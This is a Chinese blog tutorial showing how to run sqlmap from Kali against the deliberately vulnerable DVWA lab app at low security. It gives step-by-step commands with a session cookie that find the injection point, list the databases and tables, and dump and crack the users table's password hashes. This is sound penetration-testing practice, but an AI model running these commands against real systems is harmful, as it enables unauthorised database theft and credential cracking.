运用kali下的Sqlmap工具对dvwa进行sql注入测试(low)

最新推荐文章于 2024-07-20 17:33:12 发布
最新推荐文章于 2024-07-20 17:33:12 发布
阅读量2.1k 收藏 15
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stliu_hbjd/article/details/105800928
版权

1、 Windows安装dvwa

2、kali虚机安装

3、上面过程不再详述,简述运用kali上的sqlmap工具进行sql注入

查看数据库

在这里插入图片描述
–batch作用是不会询问你输入 全部默认确定省去一个个Y的输入。
运行这个命令后
在这里插入图片描述
出现上面结果,经查询原因是,没有声明一个cookie
在这里插入图片描述
重新进行抓包F12
在这里插入图片描述
再次运行
sqlmap -u “http://X.X.X.X/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=kokp8s2ondcvoclh33mo45g0ck” --batch
在这里插入图片描述

在这里插入图片描述
可以发现系统存在注入点
然后就可以利用下面命令找出所有数据库
sqlmap -u “http://192.168.31.237/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=kokp8s2ondcvoclh33mo45g0ck” --batch --dbs
在这里插入图片描述

得到如下所示数据库
在这里插入图片描述
查看数据库dvwa中的表
命令:
sqlmap -u “http://192.168.31.237/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=kokp8s2ondcvoclh33mo45g0ck” -D dvwa --tables
在这里插入图片描述
结果如图两个表
在这里插入图片描述

查看表中的字段
sqlmap -u “http://192.168.31.237/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=kokp8s2ondcvoclh33mo45g0ck” -D dvwa -T users --column
在这里插入图片描述
结果如下图字段
在这里插入图片描述
查看字段内容
sqlmap -u “http://192.168.31.237/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=kokp8s2ondcvoclh33mo45g0ck” -D dvwa -T users -C “users,password”
在这里插入图片描述

结果如图,都是经过md5加密后
在这里插入图片描述
系统自动破解后
得到下图
在这里插入图片描述
sql注入初级实验就做完了。

stliu_hbjd
关注
KALI LINUX2021环境下使用sqlmap进行DVWA中的sql注入安全等级LOW
weixin_39464539的博客
06-07 1628
KALI LINUX环境下使用sqlmap进行DVWA中的sql注入安全等级LOW)渗透环境第一步:将DVWA安全等级调整为LOW (使用谷歌Chrome浏览器)第二步:利用网页对sql是否可以注入进行简单判断第三步:使用kali 进行注入(需要注意需要加入cookie)功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTe
使用Sqlmapdvwa进行sql注入测试(初级阶段)
fanxindong0620的博客
11-07 3403
0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入测试页面 1.获取DVWA的url和cookie 在输入框中输入1,显示有内容,此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容,用于下文的sql注入终...
Kali渗透测试DVWA系列(三)——SQL Injection(SQL注入
weixin_45116657的博客
08-22 2330
目录: 一、SQL注入简介: SQL注入漏洞原理 SQL注入类型 SQL注入过程 二、实验环境 三、实验步骤 安全级别:LOW 安全级别:Medium 安全级别:High 安全级别:Impossible 一、SQL注入简介 1、SQL注入漏洞原理: SQL注入漏洞原理:把SQL命令插入到Web表单提交,或输入域名,或网页提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。(即,将...
kali linux——SQLmap注入学习实战- dvwa
一别两宽丶各生欢喜
07-04 1万+
目录 1、安装phpstudy和dvwa创建测试环境 2、选择sql注入,输入userid并提交,记录当前url和网页cookie 3、开始sqlmap爆破 1、安装phpstudy和dvwa创建测试环境 注意: 本文图片太大,鼠标点开查看比较清晰。 dvwa文件夹放入phpstudy网站根目录下面。 修改phpstudy配置文件数据库密码为root。 dvwa登陆页面admin...
Kali sqlmapDVWA
最新发布
weixin_50367387的博客
07-20 257
注:绿色框内的内容为DVWA中的SQL注入页面所在的URL;蓝色框的内容为该页面的cookie值(在该页面按F12调出开发界面,network中找到cookie值)(建议将kalisqlmap版本更新至最新版,这样就不会出现暂停选择了)遇到下列情况时,我们选择1并回车;(这是让我选择用什么去爆破密码)选择好密码破解方式后,我们就得到了账户和其密码;使用kalisqlmap工具DVWASQL注入扫描
Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞
Fly_鹏程万里
05-16 1871
前言服务提供的所有信息保存在数据库中。因此,数据库总会成为攻击者的攻击对象。本节将介绍以数据库为对象,通过网络服务和近场通信网络获取信息的工具SQLmap:获取数据库信息sqlmap是一款开源的渗透测试工具,它可以自动搜索SQL注入漏洞,并自动化攻击数据库服务器。这款功能超强的搜索检测引擎可以从数据库的Fingerprinting(获取信息)向数据库输出数据、访问文件系统、访问频段外区域以执行O...
kali中的sqlmap使用
yishuihanwyf的博客
12-01 968
kalisqlmap中的简单使用
自学渗透测试使用 DVWASQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2626
SQL注入漏洞
一起学安全测试——用sqlmapdvwa实现SQL注入测试
热门推荐
灰蓝
03-29 1万+
sqlmap是一款进行SQL注入工具,非常简单好用。我们在dvwa上试着用sqlmap实现注入,拿到数据库的信息。搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。kali linux自带(之后演示在kali上)。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwa的SQL Injection,打开浏
kali下的SQL注入DVWA sql注入 low等级)
weixin_43749051的博客
03-06 2054
(1)在kali下打开浏览器,输入http://192.168.0.184(win7的IP地址)/DVWA/login.php 输入账号密码登录进去,然后点击左侧的“DVWA Security”,选择“low”级别,点击选定。 (2)打开火狐浏览器,添加附件组件tamper data,安装后打开,然后登录dvwa,获取cookie值 (3)获取要测试的url,点击SQL Injection菜单,在输入框输入1,点击submit,获取待测试的url:http://192.168.169.129/dvwa
kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 6004
安全等级调为low进入SQL Injection(Blind)页面。
sqlmap自动化漏洞利用(DVWA初、中、高)
qq_42620328的博客
10-14 7364
sqlmap自动化漏洞利用(DVWA
渗透测试实验_在kali Linux 2021环境下使用sqlmapDVWA进行sql注入
weixin_47133613的博客
04-06 8355
文章目录1. sqlmap是什么2. 启动kali Linux ,进行sqlmap更新3. 启动phpStudy,启动火狐浏览器代理,运行BurpSuite4. 如果sqlmap出现404或者返回test的报错,可以尝试重置DVWA,重启phpStudy5. 选择安全等级“Low”,点击“SQL Injection”,通过报文中的url和cookie构造sqlmap命令获取信息5.1 获取数据库5.2 获取dvwa数据库中的表名5.3 获取dvwa库中users表中的列名5.4 获取dvwa库中users表
Kali渗透测试DVWA系列7——SQL Injection(SQL注入
浅浅的博客
06-13 3835
目录 一、SQL注入 1、SQL注入漏洞原理 2、SQL注入类型 3、SQL注入过程 二、实验环境 三、实验步骤 安全级别:LOW 安全等级:Medium 安全级别:High 安全级别:Impossible 一、SQL注入 1、SQL注入漏洞原理 把SQL命令插入到Web表单提交、或输入域名、或页面提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。 2、S...
使用sqlmap对OWASP靶机进行sql注入练习操作实例展示
WEL测试
03-30 1万+
前置条件 靶机:OWASP_Broken_Web_Apps_VM_0.94 靶机IP:192.168.88.138 初始密码是:root/owaspbwa kali安装的镜像为:kali-linux-2019.1a-amd64.iso KaliIP为:192.168.88.132 使用sqlmap进行sql注入 网站为:http://192.168.88.138 故意在输入...
kali使用sqlmap进行sql注入
weixin_33835690的博客
06-14 5022
sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆...
Kali渗透测试(九)——DVWA SQL 注入
Bulldozer_GD的博客
07-16 614
Kali渗透测试(九)——DVWASQL注入 一. 低级别,没有对用户输入做任何限制,提及的数据直接拼接。 1. 查询所有数据库 2. 查询dvwa库中的表名 查询字段名 4. 查询用户名密码 5.也可以进行操作系统级别的命令执行 6.无权读取information_schema ,拒绝 union/order by 时: 猜列名:利用burpsuite Intruder 和字典文件 ' and column is null--猜表名 ' and table.user is n
Kali自动化SQL注入神器————JSQL
Fly_鹏程万里
06-07 8121
JSQL简介jSQL injection是一款由JAVA开法的SQL自动化注入工具,它提供了数据库查询、后台爆破、文件读取、Web shell、SQL Shell、文件上传、暴力枚举、编码、批量注入测试等强大的功能,是一款非常不错的工具,也是渗透测试人员的强大助手。它支持GET\POST注入,同时也可以进行HTTP头注入(这个需要用户自动构建)主界面对于JSQL,用户可以通过在终端中直接输入jsq...
使用SQLmapdvwa进行SQL注入测试
yusakul的博客
11-19 3273
SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap 搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwa的SQL Injection,打开浏览器调试,输入user id并submit...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值